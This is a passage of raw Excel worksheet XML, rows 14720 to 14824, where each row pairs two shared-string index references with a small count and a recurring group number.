        <v>1195</v>
      </c>
    </row>
    <row r="14720" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14720" t="s">
        <v>16228</v>
      </c>
      <c r="B14720" t="s">
        <v>16215</v>
      </c>
      <c r="C14720">
        <v>0</v>
      </c>
      <c r="D14720">
        <v>1195</v>
      </c>
    </row>
    <row r="14721" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14721" t="s">
        <v>16231</v>
      </c>
      <c r="B14721" t="s">
        <v>16216</v>
      </c>
      <c r="C14721">
        <v>1</v>
      </c>
      <c r="D14721">
        <v>1195</v>
      </c>
    </row>
    <row r="14722" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14722" t="s">
        <v>16228</v>
      </c>
      <c r="B14722" t="s">
        <v>16217</v>
      </c>
      <c r="C14722">
        <v>6</v>
      </c>
      <c r="D14722">
        <v>1195</v>
      </c>
    </row>
    <row r="14723" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14723" t="s">
        <v>16231</v>
      </c>
      <c r="B14723" t="s">
        <v>16218</v>
      </c>
      <c r="C14723">
        <v>1</v>
      </c>
      <c r="D14723">
        <v>1195</v>
      </c>
    </row>
    <row r="14724" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14724" t="s">
        <v>16229</v>
      </c>
      <c r="B14724" t="s">
        <v>16219</v>
      </c>
      <c r="C14724">
        <v>0</v>
      </c>
      <c r="D14724">
        <v>1195</v>
      </c>
    </row>
    <row r="14725" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14725" t="s">
        <v>16230</v>
      </c>
      <c r="B14725" t="s">
        <v>16220</v>
      </c>
      <c r="C14725">
        <v>1</v>
      </c>
      <c r="D14725">
        <v>1195</v>
      </c>
    </row>
    <row r="14726" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14726" t="s">
        <v>16229</v>
      </c>
      <c r="B14726" t="s">
        <v>16221</v>
      </c>
      <c r="C14726">
        <v>5</v>
      </c>
      <c r="D14726">
        <v>1195</v>
      </c>
    </row>
    <row r="14727" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14727" t="s">
        <v>16230</v>
      </c>
      <c r="B14727" t="s">
        <v>16222</v>
      </c>
      <c r="C14727">
        <v>15</v>
      </c>
      <c r="D14727">
        <v>1195</v>
      </c>
    </row>
    <row r="14728" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14728" t="s">
        <v>16223</v>
      </c>
      <c r="B14728" t="s">
        <v>16223</v>
      </c>
      <c r="C14728">
        <v>26</v>
      </c>
      <c r="D14728">
        <v>1195</v>
      </c>
    </row>
    <row r="14729" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14729" t="s">
        <v>16224</v>
      </c>
      <c r="B14729" t="s">
        <v>16224</v>
      </c>
      <c r="C14729">
        <v>1</v>
      </c>
      <c r="D14729">
        <v>1195</v>
      </c>
    </row>
    <row r="14730" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14730" t="s">
        <v>16228</v>
      </c>
      <c r="B14730" t="s">
        <v>16211</v>
      </c>
      <c r="C14730">
        <v>0</v>
      </c>
      <c r="D14730">
        <v>1518</v>
      </c>
    </row>
    <row r="14731" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14731" t="s">
        <v>16231</v>
      </c>
      <c r="B14731" t="s">
        <v>16212</v>
      </c>
      <c r="C14731">
        <v>0</v>
      </c>
      <c r="D14731">
        <v>1518</v>
      </c>
    </row>
    <row r="14732" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14732" t="s">
        <v>16228</v>
      </c>
      <c r="B14732" t="s">
        <v>16213</v>
      </c>
      <c r="C14732">
        <v>0</v>
      </c>
      <c r="D14732">
        <v>1518</v>
      </c>
    </row>
    <row r="14733" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14733" t="s">
        <v>16231</v>
      </c>
      <c r="B14733" t="s">
        <v>16214</v>
      </c>
      <c r="C14733">
        <v>0</v>
      </c>
      <c r="D14733">
        <v>1518</v>
      </c>
    </row>
    <row r="14734" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14734" t="s">
        <v>16228</v>
      </c>
      <c r="B14734" t="s">
        <v>16215</v>
      </c>
      <c r="C14734">
        <v>0</v>
      </c>
      <c r="D14734">
        <v>1518</v>
      </c>
    </row>
    <row r="14735" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14735" t="s">
        <v>16231</v>
      </c>
      <c r="B14735" t="s">
        <v>16216</v>
      </c>
      <c r="C14735">
        <v>2</v>
      </c>
      <c r="D14735">
        <v>1518</v>
      </c>
    </row>
    <row r="14736" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14736" t="s">
        <v>16228</v>
      </c>
      <c r="B14736" t="s">
        <v>16217</v>
      </c>
      <c r="C14736">
        <v>41</v>
      </c>
      <c r="D14736">
        <v>1518</v>
      </c>
    </row>
    <row r="14737" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14737" t="s">
        <v>16231</v>
      </c>
      <c r="B14737" t="s">
        <v>16218</v>
      </c>
      <c r="C14737">
        <v>1</v>
      </c>
      <c r="D14737">
        <v>1518</v>
      </c>
    </row>
    <row r="14738" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14738" t="s">
        <v>16229</v>
      </c>
      <c r="B14738" t="s">
        <v>16219</v>
      </c>
      <c r="C14738">
        <v>0</v>
      </c>
      <c r="D14738">
        <v>1518</v>
      </c>
    </row>
    <row r="14739" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14739" t="s">
        <v>16230</v>
      </c>
      <c r="B14739" t="s">
        <v>16220</v>
      </c>
      <c r="C14739">
        <v>0</v>
      </c>
      <c r="D14739">
        <v>1518</v>
      </c>
    </row>
    <row r="14740" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14740" t="s">
        <v>16229</v>
      </c>
      <c r="B14740" t="s">
        <v>16221</v>
      </c>
      <c r="C14740">
        <v>24</v>
      </c>
      <c r="D14740">
        <v>1518</v>
      </c>
    </row>
    <row r="14741" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14741" t="s">
        <v>16230</v>
      </c>
      <c r="B14741" t="s">
        <v>16222</v>
      </c>
      <c r="C14741">
        <v>6</v>
      </c>
      <c r="D14741">
        <v>1518</v>
      </c>
    </row>
    <row r="14742" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14742" t="s">
        <v>16223</v>
      </c>
      <c r="B14742" t="s">
        <v>16223</v>
      </c>
      <c r="C14742">
        <v>25</v>
      </c>
      <c r="D14742">
        <v>1518</v>
      </c>
    </row>
    <row r="14743" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14743" t="s">
        <v>16224</v>
      </c>
      <c r="B14743" t="s">
        <v>16224</v>
      </c>
      <c r="C14743">
        <v>2</v>
      </c>
      <c r="D14743">
        <v>1518</v>
      </c>
    </row>
    <row r="14744" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14744" t="s">
        <v>16228</v>
      </c>
      <c r="B14744" t="s">
        <v>16211</v>
      </c>
      <c r="C14744">
        <v>0</v>
      </c>
      <c r="D14744">
        <v>5221</v>
      </c>
    </row>
    <row r="14745" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14745" t="s">
        <v>16231</v>
      </c>
      <c r="B14745" t="s">
        <v>16212</v>
      </c>
      <c r="C14745">
        <v>0</v>
      </c>
      <c r="D14745">
        <v>5221</v>
      </c>
    </row>
    <row r="14746" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14746" t="s">
        <v>16228</v>
      </c>
      <c r="B14746" t="s">
        <v>16213</v>
      </c>
      <c r="C14746">
        <v>0</v>
      </c>
      <c r="D14746">
        <v>5221</v>
      </c>
    </row>
    <row r="14747" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14747" t="s">
        <v>16231</v>
      </c>
      <c r="B14747" t="s">
        <v>16214</v>
      </c>
      <c r="C14747">
        <v>0</v>
      </c>
      <c r="D14747">
        <v>5221</v>
      </c>
    </row>
    <row r="14748" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14748" t="s">
        <v>16228</v>
      </c>
      <c r="B14748" t="s">
        <v>16215</v>
      </c>
      <c r="C14748">
        <v>1</v>
      </c>
      <c r="D14748">
        <v>5221</v>
      </c>
    </row>
    <row r="14749" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14749" t="s">
        <v>16231</v>
      </c>
      <c r="B14749" t="s">
        <v>16216</v>
      </c>
      <c r="C14749">
        <v>1</v>
      </c>
      <c r="D14749">
        <v>5221</v>
      </c>
    </row>
    <row r="14750" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14750" t="s">
        <v>16228</v>
      </c>
      <c r="B14750" t="s">
        <v>16217</v>
      </c>
      <c r="C14750">
        <v>0</v>
      </c>
      <c r="D14750">
        <v>5221</v>
      </c>
    </row>
    <row r="14751" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14751" t="s">
        <v>16231</v>
      </c>
      <c r="B14751" t="s">
        <v>16218</v>
      </c>
      <c r="C14751">
        <v>0</v>
      </c>
      <c r="D14751">
        <v>5221</v>
      </c>
    </row>
    <row r="14752" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14752" t="s">
        <v>16229</v>
      </c>
      <c r="B14752" t="s">
        <v>16219</v>
      </c>
      <c r="C14752">
        <v>0</v>
      </c>
      <c r="D14752">
        <v>5221</v>
      </c>
    </row>
    <row r="14753" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14753" t="s">
        <v>16230</v>
      </c>
      <c r="B14753" t="s">
        <v>16220</v>
      </c>
      <c r="C14753">
        <v>0</v>
      </c>
      <c r="D14753">
        <v>5221</v>
      </c>
    </row>
    <row r="14754" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14754" t="s">
        <v>16229</v>
      </c>
      <c r="B14754" t="s">
        <v>16221</v>
      </c>
      <c r="C14754">
        <v>3</v>
      </c>
      <c r="D14754">
        <v>5221</v>
      </c>
    </row>
    <row r="14755" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14755" t="s">
        <v>16230</v>
      </c>
      <c r="B14755" t="s">
        <v>16222</v>
      </c>
      <c r="C14755">
        <v>2</v>
      </c>
      <c r="D14755">
        <v>5221</v>
      </c>
    </row>
    <row r="14756" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14756" t="s">
        <v>16223</v>
      </c>
      <c r="B14756" t="s">
        <v>16223</v>
      </c>
      <c r="C14756">
        <v>28</v>
      </c>
      <c r="D14756">
        <v>5221</v>
      </c>
    </row>
    <row r="14757" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14757" t="s">
        <v>16224</v>
      </c>
      <c r="B14757" t="s">
        <v>16224</v>
      </c>
      <c r="C14757">
        <v>0</v>
      </c>
      <c r="D14757">
        <v>5221</v>
      </c>
    </row>
    <row r="14758" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14758" t="s">
        <v>16228</v>
      </c>
      <c r="B14758" t="s">
        <v>16211</v>
      </c>
      <c r="C14758">
        <v>0</v>
      </c>
      <c r="D14758">
        <v>5137</v>
      </c>
    </row>
    <row r="14759" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14759" t="s">
        <v>16231</v>
      </c>
      <c r="B14759" t="s">
        <v>16212</v>
      </c>
      <c r="C14759">
        <v>0</v>
      </c>
      <c r="D14759">
        <v>5137</v>
      </c>
    </row>
    <row r="14760" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14760" t="s">
        <v>16228</v>
      </c>
      <c r="B14760" t="s">
        <v>16213</v>
      </c>
      <c r="C14760">
        <v>0</v>
      </c>
      <c r="D14760">
        <v>5137</v>
      </c>
    </row>
    <row r="14761" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14761" t="s">
        <v>16231</v>
      </c>
      <c r="B14761" t="s">
        <v>16214</v>
      </c>
      <c r="C14761">
        <v>0</v>
      </c>
      <c r="D14761">
        <v>5137</v>
      </c>
    </row>
    <row r="14762" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14762" t="s">
        <v>16228</v>
      </c>
      <c r="B14762" t="s">
        <v>16215</v>
      </c>
      <c r="C14762">
        <v>7</v>
      </c>
      <c r="D14762">
        <v>5137</v>
      </c>
    </row>
    <row r="14763" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14763" t="s">
        <v>16231</v>
      </c>
      <c r="B14763" t="s">
        <v>16216</v>
      </c>
      <c r="C14763">
        <v>3</v>
      </c>
      <c r="D14763">
        <v>5137</v>
      </c>
    </row>
    <row r="14764" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14764" t="s">
        <v>16228</v>
      </c>
      <c r="B14764" t="s">
        <v>16217</v>
      </c>
      <c r="C14764">
        <v>0</v>
      </c>
      <c r="D14764">
        <v>5137</v>
      </c>
    </row>
    <row r="14765" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14765" t="s">
        <v>16231</v>
      </c>
      <c r="B14765" t="s">
        <v>16218</v>
      </c>
      <c r="C14765">
        <v>0</v>
      </c>
      <c r="D14765">
        <v>5137</v>
      </c>
    </row>
    <row r="14766" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14766" t="s">
        <v>16229</v>
      </c>
      <c r="B14766" t="s">
        <v>16219</v>
      </c>
      <c r="C14766">
        <v>36</v>
      </c>
      <c r="D14766">
        <v>5137</v>
      </c>
    </row>
    <row r="14767" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14767" t="s">
        <v>16230</v>
      </c>
      <c r="B14767" t="s">
        <v>16220</v>
      </c>
      <c r="C14767">
        <v>63</v>
      </c>
      <c r="D14767">
        <v>5137</v>
      </c>
    </row>
    <row r="14768" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14768" t="s">
        <v>16229</v>
      </c>
      <c r="B14768" t="s">
        <v>16221</v>
      </c>
      <c r="C14768">
        <v>0</v>
      </c>
      <c r="D14768">
        <v>5137</v>
      </c>
    </row>
    <row r="14769" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14769" t="s">
        <v>16230</v>
      </c>
      <c r="B14769" t="s">
        <v>16222</v>
      </c>
      <c r="C14769">
        <v>0</v>
      </c>
      <c r="D14769">
        <v>5137</v>
      </c>
    </row>
    <row r="14770" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14770" t="s">
        <v>16223</v>
      </c>
      <c r="B14770" t="s">
        <v>16223</v>
      </c>
      <c r="C14770">
        <v>20</v>
      </c>
      <c r="D14770">
        <v>5137</v>
      </c>
    </row>
    <row r="14771" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14771" t="s">
        <v>16224</v>
      </c>
      <c r="B14771" t="s">
        <v>16224</v>
      </c>
      <c r="C14771">
        <v>2</v>
      </c>
      <c r="D14771">
        <v>5137</v>
      </c>
    </row>
    <row r="14772" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14772" t="s">
        <v>16228</v>
      </c>
      <c r="B14772" t="s">
        <v>16211</v>
      </c>
      <c r="C14772">
        <v>0</v>
      </c>
      <c r="D14772">
        <v>1443</v>
      </c>
    </row>
    <row r="14773" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14773" t="s">
        <v>16231</v>
      </c>
      <c r="B14773" t="s">
        <v>16212</v>
      </c>
      <c r="C14773">
        <v>0</v>
      </c>
      <c r="D14773">
        <v>1443</v>
      </c>
    </row>
    <row r="14774" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14774" t="s">
        <v>16228</v>
      </c>
      <c r="B14774" t="s">
        <v>16213</v>
      </c>
      <c r="C14774">
        <v>0</v>
      </c>
      <c r="D14774">
        <v>1443</v>
      </c>
    </row>
    <row r="14775" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14775" t="s">
        <v>16231</v>
      </c>
      <c r="B14775" t="s">
        <v>16214</v>
      </c>
      <c r="C14775">
        <v>0</v>
      </c>
      <c r="D14775">
        <v>1443</v>
      </c>
    </row>
    <row r="14776" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14776" t="s">
        <v>16228</v>
      </c>
      <c r="B14776" t="s">
        <v>16215</v>
      </c>
      <c r="C14776">
        <v>2</v>
      </c>
      <c r="D14776">
        <v>1443</v>
      </c>
    </row>
    <row r="14777" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14777" t="s">
        <v>16231</v>
      </c>
      <c r="B14777" t="s">
        <v>16216</v>
      </c>
      <c r="C14777">
        <v>2</v>
      </c>
      <c r="D14777">
        <v>1443</v>
      </c>
    </row>
    <row r="14778" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14778" t="s">
        <v>16228</v>
      </c>
      <c r="B14778" t="s">
        <v>16217</v>
      </c>
      <c r="C14778">
        <v>0</v>
      </c>
      <c r="D14778">
        <v>1443</v>
      </c>
    </row>
    <row r="14779" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14779" t="s">
        <v>16231</v>
      </c>
      <c r="B14779" t="s">
        <v>16218</v>
      </c>
      <c r="C14779">
        <v>0</v>
      </c>
      <c r="D14779">
        <v>1443</v>
      </c>
    </row>
    <row r="14780" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14780" t="s">
        <v>16229</v>
      </c>
      <c r="B14780" t="s">
        <v>16219</v>
      </c>
      <c r="C14780">
        <v>0</v>
      </c>
      <c r="D14780">
        <v>1443</v>
      </c>
    </row>
    <row r="14781" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14781" t="s">
        <v>16230</v>
      </c>
      <c r="B14781" t="s">
        <v>16220</v>
      </c>
      <c r="C14781">
        <v>0</v>
      </c>
      <c r="D14781">
        <v>1443</v>
      </c>
    </row>
    <row r="14782" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14782" t="s">
        <v>16229</v>
      </c>
      <c r="B14782" t="s">
        <v>16221</v>
      </c>
      <c r="C14782">
        <v>12</v>
      </c>
      <c r="D14782">
        <v>1443</v>
      </c>
    </row>
    <row r="14783" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14783" t="s">
        <v>16230</v>
      </c>
      <c r="B14783" t="s">
        <v>16222</v>
      </c>
      <c r="C14783">
        <v>10</v>
      </c>
      <c r="D14783">
        <v>1443</v>
      </c>
    </row>
    <row r="14784" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14784" t="s">
        <v>16223</v>
      </c>
      <c r="B14784" t="s">
        <v>16223</v>
      </c>
      <c r="C14784">
        <v>25</v>
      </c>
      <c r="D14784">
        <v>1443</v>
      </c>
    </row>
    <row r="14785" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14785" t="s">
        <v>16224</v>
      </c>
      <c r="B14785" t="s">
        <v>16224</v>
      </c>
      <c r="C14785">
        <v>2</v>
      </c>
      <c r="D14785">
        <v>1443</v>
      </c>
    </row>
    <row r="14786" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14786" t="s">
        <v>16228</v>
      </c>
      <c r="B14786" t="s">
        <v>16211</v>
      </c>
      <c r="C14786">
        <v>0</v>
      </c>
      <c r="D14786">
        <v>1312</v>
      </c>
    </row>
    <row r="14787" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14787" t="s">
        <v>16231</v>
      </c>
      <c r="B14787" t="s">
        <v>16212</v>
      </c>
      <c r="C14787">
        <v>0</v>
      </c>
      <c r="D14787">
        <v>1312</v>
      </c>
    </row>
    <row r="14788" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14788" t="s">
        <v>16228</v>
      </c>
      <c r="B14788" t="s">
        <v>16213</v>
      </c>
      <c r="C14788">
        <v>0</v>
      </c>
      <c r="D14788">
        <v>1312</v>
      </c>
    </row>
    <row r="14789" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14789" t="s">
        <v>16231</v>
      </c>
      <c r="B14789" t="s">
        <v>16214</v>
      </c>
      <c r="C14789">
        <v>0</v>
      </c>
      <c r="D14789">
        <v>1312</v>
      </c>
    </row>
    <row r="14790" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14790" t="s">
        <v>16228</v>
      </c>
      <c r="B14790" t="s">
        <v>16215</v>
      </c>
      <c r="C14790">
        <v>2</v>
      </c>
      <c r="D14790">
        <v>1312</v>
      </c>
    </row>
    <row r="14791" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14791" t="s">
        <v>16231</v>
      </c>
      <c r="B14791" t="s">
        <v>16216</v>
      </c>
      <c r="C14791">
        <v>2</v>
      </c>
      <c r="D14791">
        <v>1312</v>
      </c>
    </row>
    <row r="14792" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14792" t="s">
        <v>16228</v>
      </c>
      <c r="B14792" t="s">
        <v>16217</v>
      </c>
      <c r="C14792">
        <v>10</v>
      </c>
      <c r="D14792">
        <v>1312</v>
      </c>
    </row>
    <row r="14793" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14793" t="s">
        <v>16231</v>
      </c>
      <c r="B14793" t="s">
        <v>16218</v>
      </c>
      <c r="C14793">
        <v>0</v>
      </c>
      <c r="D14793">
        <v>1312</v>
      </c>
    </row>
    <row r="14794" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14794" t="s">
        <v>16229</v>
      </c>
      <c r="B14794" t="s">
        <v>16219</v>
      </c>
      <c r="C14794">
        <v>0</v>
      </c>
      <c r="D14794">
        <v>1312</v>
      </c>
    </row>
    <row r="14795" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14795" t="s">
        <v>16230</v>
      </c>
      <c r="B14795" t="s">
        <v>16220</v>
      </c>
      <c r="C14795">
        <v>0</v>
      </c>
      <c r="D14795">
        <v>1312</v>
      </c>
    </row>
    <row r="14796" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14796" t="s">
        <v>16229</v>
      </c>
      <c r="B14796" t="s">
        <v>16221</v>
      </c>
      <c r="C14796">
        <v>0</v>
      </c>
      <c r="D14796">
        <v>1312</v>
      </c>
    </row>
    <row r="14797" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14797" t="s">
        <v>16230</v>
      </c>
      <c r="B14797" t="s">
        <v>16222</v>
      </c>
      <c r="C14797">
        <v>0</v>
      </c>
      <c r="D14797">
        <v>1312</v>
      </c>
    </row>
    <row r="14798" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14798" t="s">
        <v>16223</v>
      </c>
      <c r="B14798" t="s">
        <v>16223</v>
      </c>
      <c r="C14798">
        <v>25</v>
      </c>
      <c r="D14798">
        <v>1312</v>
      </c>
    </row>
    <row r="14799" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14799" t="s">
        <v>16224</v>
      </c>
      <c r="B14799" t="s">
        <v>16224</v>
      </c>
      <c r="C14799">
        <v>1</v>
      </c>
      <c r="D14799">
        <v>1312</v>
      </c>
    </row>
    <row r="14800" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14800" t="s">
        <v>16228</v>
      </c>
      <c r="B14800" t="s">
        <v>16211</v>
      </c>
      <c r="C14800">
        <v>0</v>
      </c>
      <c r="D14800">
        <v>5202</v>
      </c>
    </row>
    <row r="14801" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14801" t="s">
        <v>16231</v>
      </c>
      <c r="B14801" t="s">
        <v>16212</v>
      </c>
      <c r="C14801">
        <v>0</v>
      </c>
      <c r="D14801">
        <v>5202</v>
      </c>
    </row>
    <row r="14802" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14802" t="s">
        <v>16228</v>
      </c>
      <c r="B14802" t="s">
        <v>16213</v>
      </c>
      <c r="C14802">
        <v>0</v>
      </c>
      <c r="D14802">
        <v>5202</v>
      </c>
    </row>
    <row r="14803" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14803" t="s">
        <v>16231</v>
      </c>
      <c r="B14803" t="s">
        <v>16214</v>
      </c>
      <c r="C14803">
        <v>0</v>
      </c>
      <c r="D14803">
        <v>5202</v>
      </c>
    </row>
    <row r="14804" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14804" t="s">
        <v>16228</v>
      </c>
      <c r="B14804" t="s">
        <v>16215</v>
      </c>
      <c r="C14804">
        <v>2</v>
      </c>
      <c r="D14804">
        <v>5202</v>
      </c>
    </row>
    <row r="14805" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14805" t="s">
        <v>16231</v>
      </c>
      <c r="B14805" t="s">
        <v>16216</v>
      </c>
      <c r="C14805">
        <v>0</v>
      </c>
      <c r="D14805">
        <v>5202</v>
      </c>
    </row>
    <row r="14806" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14806" t="s">
        <v>16228</v>
      </c>
      <c r="B14806" t="s">
        <v>16217</v>
      </c>
      <c r="C14806">
        <v>2</v>
      </c>
      <c r="D14806">
        <v>5202</v>
      </c>
    </row>
    <row r="14807" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14807" t="s">
        <v>16231</v>
      </c>
      <c r="B14807" t="s">
        <v>16218</v>
      </c>
      <c r="C14807">
        <v>0</v>
      </c>
      <c r="D14807">
        <v>5202</v>
      </c>
    </row>
    <row r="14808" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14808" t="s">
        <v>16229</v>
      </c>
      <c r="B14808" t="s">
        <v>16219</v>
      </c>
      <c r="C14808">
        <v>0</v>
      </c>
      <c r="D14808">
        <v>5202</v>
      </c>
    </row>
    <row r="14809" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14809" t="s">
        <v>16230</v>
      </c>
      <c r="B14809" t="s">
        <v>16220</v>
      </c>
      <c r="C14809">
        <v>0</v>
      </c>
      <c r="D14809">
        <v>5202</v>
      </c>
    </row>
    <row r="14810" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14810" t="s">
        <v>16229</v>
      </c>
      <c r="B14810" t="s">
        <v>16221</v>
      </c>
      <c r="C14810">
        <v>5</v>
      </c>
      <c r="D14810">
        <v>5202</v>
      </c>
    </row>
    <row r="14811" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14811" t="s">
        <v>16230</v>
      </c>
      <c r="B14811" t="s">
        <v>16222</v>
      </c>
      <c r="C14811">
        <v>20</v>
      </c>
      <c r="D14811">
        <v>5202</v>
      </c>
    </row>
    <row r="14812" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14812" t="s">
        <v>16223</v>
      </c>
      <c r="B14812" t="s">
        <v>16223</v>
      </c>
      <c r="C14812">
        <v>6</v>
      </c>
      <c r="D14812">
        <v>5202</v>
      </c>
    </row>
    <row r="14813" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14813" t="s">
        <v>16224</v>
      </c>
      <c r="B14813" t="s">
        <v>16224</v>
      </c>
      <c r="C14813">
        <v>1</v>
      </c>
      <c r="D14813">
        <v>5202</v>
      </c>
    </row>
    <row r="14814" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14814" t="s">
        <v>16228</v>
      </c>
      <c r="B14814" t="s">
        <v>16211</v>
      </c>
      <c r="C14814">
        <v>0</v>
      </c>
      <c r="D14814">
        <v>5140</v>
      </c>
    </row>
    <row r="14815" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14815" t="s">
        <v>16231</v>
      </c>
      <c r="B14815" t="s">
        <v>16212</v>
      </c>
      <c r="C14815">
        <v>0</v>
      </c>
      <c r="D14815">
        <v>5140</v>
      </c>
    </row>
    <row r="14816" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14816" t="s">
        <v>16228</v>
      </c>
      <c r="B14816" t="s">
        <v>16213</v>
      </c>
      <c r="C14816">
        <v>0</v>
      </c>
      <c r="D14816">
        <v>5140</v>
      </c>
    </row>
    <row r="14817" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14817" t="s">
        <v>16231</v>
      </c>
      <c r="B14817" t="s">
        <v>16214</v>
      </c>
      <c r="C14817">
        <v>0</v>
      </c>
      <c r="D14817">
        <v>5140</v>
      </c>
    </row>
    <row r="14818" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14818" t="s">
        <v>16228</v>
      </c>
      <c r="B14818" t="s">
        <v>16215</v>
      </c>
      <c r="C14818">
        <v>2</v>
      </c>
      <c r="D14818">
        <v>5140</v>
      </c>
    </row>
    <row r="14819" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14819" t="s">
        <v>16231</v>
      </c>
      <c r="B14819" t="s">
        <v>16216</v>
      </c>
      <c r="C14819">
        <v>2</v>
      </c>
      <c r="D14819">
        <v>5140</v>
      </c>
    </row>
    <row r="14820" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14820" t="s">
        <v>16228</v>
      </c>
      <c r="B14820" t="s">
        <v>16217</v>
      </c>
      <c r="C14820">
        <v>5</v>
      </c>
      <c r="D14820">
        <v>5140</v>
      </c>
    </row>
    <row r="14821" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14821" t="s">
        <v>16231</v>
      </c>
      <c r="B14821" t="s">
        <v>16218</v>
      </c>
      <c r="C14821">
        <v>0</v>
      </c>
      <c r="D14821">
        <v>5140</v>
      </c>
    </row>
    <row r="14822" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14822" t="s">
        <v>16229</v>
      </c>
      <c r="B14822" t="s">
        <v>16219</v>
      </c>
      <c r="C14822">
        <v>0</v>
      </c>
      <c r="D14822">
        <v>5140</v>
      </c>
    </row>
    <row r="14823" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14823" t="s">
        <v>16230</v>
      </c>
      <c r="B14823" t="s">
        <v>16220</v>
      </c>
      <c r="C14823">
        <v>0</v>
      </c>
      <c r="D14823">
        <v>5140</v>
      </c>
    </row>
    <row r="14824" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14824" t="s">
        <v>16229</v>
      </c>
      <c r="B14824" t="s">
        <v>16221</v>
      </c>
      <c r="C14824">
        <v>0</v>
